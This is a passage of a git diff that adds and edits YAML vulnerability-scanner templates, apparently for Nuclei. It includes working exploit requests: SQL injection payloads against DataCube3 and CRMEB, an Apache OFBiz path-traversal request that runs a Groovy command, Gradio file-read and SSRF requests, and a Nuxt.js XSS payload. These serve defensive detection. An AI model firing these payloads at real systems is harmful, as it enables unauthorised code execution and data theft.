- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/DataCube3%20getting_index_data.php%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-31750
|
||||||
|
- https://github.com/wjlin0/poc-doc
|
||||||
|
- https://github.com/wy876/POC
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2024-31750
|
||||||
|
epss-score: 0.00043
|
||||||
|
epss-percentile: 0.0866
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: title="DataCube3"
|
||||||
|
tags: cve,cve2024,datacube3,sqli
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
req_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq")'
|
||||||
|
- 'contains(header, "application/json")'
|
||||||
|
- 'status_code==200'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a00473045022100debf69f7baa1e23b7f3488c09e93e1909abfdc7a1ea2603f6dba2cb9c703544302203d8ecbf6c297515767d7ed66820e5a80fda576b6ed82be4d00362838d096b5bc:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2024-32113
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache OFBiz Directory Traversal - Remote Code Execution
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13
|
||||||
|
remediation: |
|
||||||
|
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
|
||||||
|
reference:
|
||||||
|
- https://issues.apache.org/jira/browse/OFBIZ-13006
|
||||||
|
- https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd
|
||||||
|
- https://ofbiz.apache.org/download.html
|
||||||
|
- https://ofbiz.apache.org/security.html
|
||||||
|
- https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-32113
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2024-32113
|
||||||
|
epss-score: 0.00115
|
||||||
|
epss-percentile: 0.45112
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: app="Apache_OFBiz"
|
||||||
|
tags: cve,cve2024,apache,obiz,rce
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "java.lang.Exception:"
|
||||||
|
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4b0a00483046022100b88041381f7eeda038aa86589d4e8abaa41ddf477aafea6cd9271bdafa02ebb6022100dfb966a119b54853c7b4d4ea44205600d7bf2227910f32cd964a08a2cf91571d:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2024-3274
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure
|
||||||
|
author: DhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.
|
||||||
|
reference:
|
||||||
|
- https://github.com/netsecfish/info_cgi
|
||||||
|
- https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-3274
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cve-id: CVE-2024-3274
|
||||||
|
cwe-id: CWE-200
|
||||||
|
epss-score: 0.00045
|
||||||
|
epss-percentile: 0.15047
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: body="Text:In order to access the ShareCenter"
|
||||||
|
tags: cve,cve2024,dlink,exposure
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /cgi-bin/info.cgi HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains_all(body, "Model=", "Build=", "Macaddr=")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
# digest: 490a004630440220637a70951ffd4c3d81671b37a51e678c922a409e791bdbb538ad6cce7bb84fad0220303256e098c2a99c41e54b1518da46ac7d1910401c97102c6afaa5f2490973d9:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,43 @@
|
||||||
|
id: CVE-2024-36837
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CRMEB v.5.2.2 - SQL Injection
|
||||||
|
author: DhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.
|
||||||
|
reference:
|
||||||
|
- https://github.com/phtcloud-dev/CVE-2024-36837
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-36837
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: title="CRMEB"
|
||||||
|
tags: cve,cve2024,crmeb,sqli
|
||||||
|
|
||||||
|
variables:
|
||||||
|
num: "{{rand_int(9000000, 9999999)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "{{md5(num)}}"
|
||||||
|
- "SQLSTATE"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: content_type
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950
|
|
@ -2,7 +2,7 @@ id: ibm-note-login
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: IBM iNotes Login Panel - Detect
|
name: IBM iNotes Login Panel - Detect
|
||||||
author: dhiyaneshDK
|
author: dhiyaneshDK,righettod
|
||||||
severity: info
|
severity: info
|
||||||
description: IBM iNotes login panel was detected.
|
description: IBM iNotes login panel was detected.
|
||||||
reference:
|
reference:
|
||||||
|
@ -14,22 +14,28 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 2
|
max-request: 2
|
||||||
vendor: ibm
|
vendor: ibm
|
||||||
|
shodan-query: http.title:"IBM iNotes Login"
|
||||||
product: inotes
|
product: inotes
|
||||||
tags: ibm,edb,panel
|
tags: ibm,edb,panel,login,detect
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}'
|
- '{{BaseURL}}'
|
||||||
- '{{BaseURL}}/names.nsf'
|
- '{{BaseURL}}/names.nsf'
|
||||||
|
- '{{BaseURL}}/webredir.nsf'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- '<title>IBM iNotes Login</title>'
|
- '<title>IBM iNotes Login</title>'
|
||||||
|
- 'Lotus iNotes Login Screen'
|
||||||
|
condition: or
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a004730450220625a17ef31b35dda3592e49539d8304cc60542ca9c8d2ec4f5509568cd46f673022100f22616c9c57ba6f9ea927df6ff590fcbeb9eb33d5a1afcf66c6dd0afe77f2d7d:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100a019cfe0aba9fc651490032a791ac8c3fc7f5b9ee782c44e122161c3698cc039022100c97e7c7c28a69a32b3a4fbc73ab34d5599f81a8c34d85e266347905e4da0df9a:922c64590222798bb761d5b6d8e72950
|
|
@ -2,7 +2,7 @@ id: ibm-security-access-manager
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: IBM Security Access Manager Login Panel - Detect
|
name: IBM Security Access Manager Login Panel - Detect
|
||||||
author: geeknik
|
author: geeknik,righettod
|
||||||
severity: info
|
severity: info
|
||||||
description: IBM Security Access Manager login panel was detected.
|
description: IBM Security Access Manager login panel was detected.
|
||||||
reference:
|
reference:
|
||||||
|
@ -14,8 +14,9 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
vendor: ibm
|
vendor: ibm
|
||||||
|
shodan-query: http.title:"IBM Security Access Manager"
|
||||||
product: security_access_manager
|
product: security_access_manager
|
||||||
tags: panel,ibm
|
tags: panel,ibm,login,detect
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -27,7 +28,9 @@ http:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<title>IBM Security Access Manager</title>"
|
- "<title>IBM Security Access Manager</title>"
|
||||||
|
- "IBM Security <em>Access Manager</em>"
|
||||||
part: body
|
part: body
|
||||||
|
condition: or
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
|
@ -40,4 +43,4 @@ http:
|
||||||
- "/mga/sps/authsvc/policy/forgot_password"
|
- "/mga/sps/authsvc/policy/forgot_password"
|
||||||
part: body
|
part: body
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 4a0a00473045022100b3c31b972a1af3fbf321e8d2fad135f3c60e69ab84023684e3bdc1903e0a3f75022016212bd0980f645527268ebe265aed9838f5fe47d1fd9a37ffbac227e5765894:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100c816b86e40021cbe5ef080a1ebc36d14d60604fc4f2c7deb3f6094655b03ed26022100fa945950ba3d39b400e461e14e07ed6ed86b1b31fd9c7d2e2925cb752f4df0cf:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: turnkey-lamp-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TurnKey LAMP Panel - Detect
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
TurnKey LAMP Control Panel was detected.
|
||||||
|
reference:
|
||||||
|
- https://www.turnkeylinux.org/lamp
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: title:"TurnKey LAMP"
|
||||||
|
fofa-query: title="TurnKey LAMP"
|
||||||
|
tags: panel,login,turnkey,lamp,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "TurnKey LAMP</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4b0a004830460221008e88f309cb2b1e984efcb8d583f2474a3bb35485e4cb1ce1465533744bfc7f810221009649f52bc1dbea811b3eccf48f2df29d0d3e1e4c6bda50f7e0f405248148c0d6:922c64590222798bb761d5b6d8e72950
|
|
@ -30,10 +30,18 @@ http:
|
||||||
words:
|
words:
|
||||||
- application/xml
|
- application/xml
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "x-goog-metageneration"
|
||||||
|
- "x-goog-generation"
|
||||||
|
case-insensitive: true
|
||||||
|
negative: true
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: body
|
part: body
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '<Name>([a-z0-9-._]+)'
|
- '<Name>([a-z0-9-._]+)'
|
||||||
# digest: 4a0a004730450221008d3e2a3f2b51e293c931760a955f03b3fefa01df69177a3d7403db90accb33b402201a4fcc8481d353ec5ac6f5fdb08d85360d3facda2b3623b16e95f5ac517859a3:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100b4e7ee7ca74a63f236707271d9219e6a4c1e204e12e3e8bb2d3714a64fa9e5a8022068ee95e033478df3256a2323cf1d05917f9d857f58146001422a1b7861ce02a3:922c64590222798bb761d5b6d8e72950
|
|
@ -1,7 +1,7 @@
|
||||||
id: cookies-without-httponly-secure
|
id: cookies-without-httponly
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Cookies without HttpOnly or Secure attribute - Detect
|
name: Cookies without HttpOnly attribute - Detect
|
||||||
author: princechaddha,Mr.Bobo HP
|
author: princechaddha,Mr.Bobo HP
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
|
@ -38,6 +38,5 @@ http:
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
- "HttpOnly"
|
- "HttpOnly"
|
||||||
- "Secure"
|
|
||||||
negative: true
|
negative: true
|
||||||
# digest: 4a0a004730450220123181274d69492219d698d89cf1fd5d0b71c908b139b6a52e15df69c7b8c6aa022100da21796dba95fc800f492b76bed8877b493b296856dc7f71fe89da22aff0fe3f:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100d9b191fde19b5091d9b1ed789721ea3e93689c0b964658df7a578d1e5903ea5802205b26c3af43b5b32a731d2ecd2ef48401ae45a37258168e67710fb2f47abb0989:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,42 @@
|
||||||
|
id: cookies-without-secure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cookies without Secure attribute - Detect
|
||||||
|
author: vthiery
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
Checks whether cookies in the HTTP response contain the Secure attribute. If the Secure flag is set, it means that the cookie can only be transmitted over HTTPS
|
||||||
|
impact: |
|
||||||
|
Lack of Secure flag on cookies allows the cookie to be sent over unsecure HTTP, making it vulnerable to man-in-the-middle (MITM) attacks.
|
||||||
|
remediation: |
|
||||||
|
Ensure that all cookies are set with the Secure attribute to prevent MITM attacks.
|
||||||
|
reference:
|
||||||
|
- https://owasp.org/www-community/controls/SecureCookieAttribute
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: misconfig,http,cookie,generic
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'Set-Cookie'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "Secure"
|
||||||
|
negative: true
|
||||||
|
# digest: 4a0a0047304502201f25fc7e9994e80e24096e05ea5deaeae1785bbfa343e9e71203f64f6ab2c22902210080b280e3b3384bb5332aaf450b1c9e541b0e43795a97df1bfe8d050f4742c277:922c64590222798bb761d5b6d8e72950
|
|
@ -15,9 +15,9 @@ http:
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
|
||||||
- x-goog-metageneration
|
|
||||||
- X-Goog-Metageneration
|
|
||||||
part: header
|
part: header
|
||||||
|
words:
|
||||||
# digest: 4a0a00473045022016072ed0dd17077e2035b0d53506ba19f8dc600c375fd55b469870b2b36c2d17022100b6f9dde6d428cffc1cae21932a1a5a81ff87f210e1f8dd572d63255596c082ff:922c64590222798bb761d5b6d8e72950
|
- "x-goog-metageneration"
|
||||||
|
- "x-goog-generation"
|
||||||
|
case-insensitive: true
|
||||||
|
# digest: 4a0a00473045022043c130c84c7c7ff302413d36f39fdd14b34e2ae766c8728f2d7ef891cd125f80022100c51e9928d746128a91e866f8bd77bb46897602cc17ed9d9fbacbfd9de7794e68:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,64 @@
|
||||||
|
id: gradio-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gradio 3.47 – 3.50.2 - Local File Inclusion
|
||||||
|
author: nvn1729
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Local file read by calling arbitrary methods of Components class between Gradio versions 3.47 – 3.50.2
|
||||||
|
reference:
|
||||||
|
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
|
||||||
|
- https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
epss-percentile: 0.36659
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
shodan-query: html:"__gradio_mode__"
|
||||||
|
tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /component_server HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /file={{download_path}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
name: download_path
|
||||||
|
internal: true
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "\"?([^\"]+)"
|
||||||
|
|
||||||
|
attack: clusterbomb
|
||||||
|
payloads:
|
||||||
|
fuzz_component_id: helpers/wordlists/numbers.txt
|
||||||
|
path:
|
||||||
|
- /etc/passwd
|
||||||
|
- c:\\windows\\win.ini
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body_2
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
- "\\[(font|extension|file)s\\]"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4b0a00483046022100dee488452114cf8cba3e74b09165ce96dd590f0ac0705828cdc977a8a8bd5f39022100d64d96b1ba3cd9e79039f6b3436f1cf7fd37e88bb8bb0249b76423524c3939a4:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,58 @@
|
||||||
|
id: gradio-ssrf
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gradio 3.47 - 3.50.2 - Server-Side Request Forgery
|
||||||
|
author: nvn1729
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2.
|
||||||
|
reference:
|
||||||
|
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
|
||||||
|
- https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
epss-percentile: 0.36659
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
shodan-query: html:"__gradio_mode__"
|
||||||
|
tags: cve,cve2024,unauth,gradio,ssrf
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /component_server HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"component_id": "{{fuzz_component_id}}", "data": "http://oast.me", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /file={{download_path}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
name: download_path
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "\"?([^\"]+)"
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
fuzz_component_id: helpers/wordlists/numbers.txt
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_2
|
||||||
|
words:
|
||||||
|
- "<h1> Interactsh Server </h1>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4b0a0048304602210084254e5be884aa98296a738a4c7318f5fc3144cd7a242e19dfc57c3e7540a125022100db240aae793f3c25c826a49fe256d4109590d1fd40a2ad08de4d75925b3985f3:922c64590222798bb761d5b6d8e72950
|
|
@ -1,7 +1,7 @@
|
||||||
id: nuxt-js-xss
|
id: nuxt-js-xss
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Error Page XSS - Nuxt.js
|
name: Nuxt.js Error Page - Cross-Site Scripting
|
||||||
author: DhiyaneshDK
|
author: DhiyaneshDK
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
|
@ -11,23 +11,26 @@ info:
|
||||||
- https://bryces.io/blog/nuxt3
|
- https://bryces.io/blog/nuxt3
|
||||||
- https://twitter.com/fofabot/status/1669339995780558849
|
- https://twitter.com/fofabot/status/1669339995780558849
|
||||||
metadata:
|
metadata:
|
||||||
verified: "true"
|
verified: true
|
||||||
max-request: 1
|
max-request: 1
|
||||||
shodan-query: html:"buildAssetsDir" "nuxt"
|
shodan-query: html:"buildAssetsDir" "nuxt"
|
||||||
fofa-query: body="buildAssetsDir" && body="__nuxt"
|
fofa-query: body="buildAssetsDir" && body="__nuxt"
|
||||||
tags: huntr,xss,nuxtjs,error
|
tags: huntr,xss,nuxtjs
|
||||||
|
|
||||||
|
variables:
|
||||||
|
payload: "<script>alert(document.domain)</script>"
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/__nuxt_error?stack=%0A<script>alert(document.domain)</script>"
|
- "{{BaseURL}}/__nuxt_error?stack=%0A{{url_encode(payload)}}"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "<script>alert(document.domain)</script>"
|
- "{{payload}}"
|
||||||
- "window.__NUXT__"
|
- "window.__NUXT__"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
@ -35,5 +38,4 @@ http:
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
- "text/html"
|
- "text/html"
|
||||||
|
# digest: 4b0a00483046022100e184ac245cc42774284e2fda8f4ffd559e46ffb273b587dfab98c576f73b92fa022100931427a4621c57da048aa4fdc2981b8ad64512cf8d4894e3dc3f1ce607d0b090:922c64590222798bb761d5b6d8e72950
|
||||||
# digest: 4a0a00473045022100858932f971761dbf5f90cae1f6fd762587bc8db062bc348a0e75e6919d1c1ed502207f3e15e50de570269cc2d415aea273f1abb2440e270d272e572e7081f2a59402:922c64590222798bb761d5b6d8e72950
|
|
|
@ -189,8 +189,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
|
||||||
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
|
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
|
||||||
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
|
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
|
||||||
contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
|
contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
|
||||||
cves.json:15e3d2b258890ea3f6670c981a4b0703d98a1b98
|
cves.json:bb4672b4751b17c034799fabf7d52f0c8aed3302
|
||||||
cves.json-checksum.txt:eb4c7db68b582f0cd4ecf6cdb67ff52c6532e739
|
cves.json-checksum.txt:b10cb415f16dd74d75e70e696defacaf045d8c3e
|
||||||
dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730
|
dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730
|
||||||
dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752
|
dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752
|
||||||
dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e
|
dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e
|
||||||
|
@ -206,11 +206,12 @@ dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d3
|
||||||
dast/vulnerabilities/redirect/open-redirect.yaml:4fa1fca9a4a36c7fd81faafd3f7bf474b4efa471
|
dast/vulnerabilities/redirect/open-redirect.yaml:4fa1fca9a4a36c7fd81faafd3f7bf474b4efa471
|
||||||
dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836
|
dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836
|
||||||
dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f
|
dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f
|
||||||
|
dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74
|
||||||
dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26
|
dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26
|
||||||
dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661
|
dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661
|
||||||
dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851
|
dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851
|
||||||
dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253
|
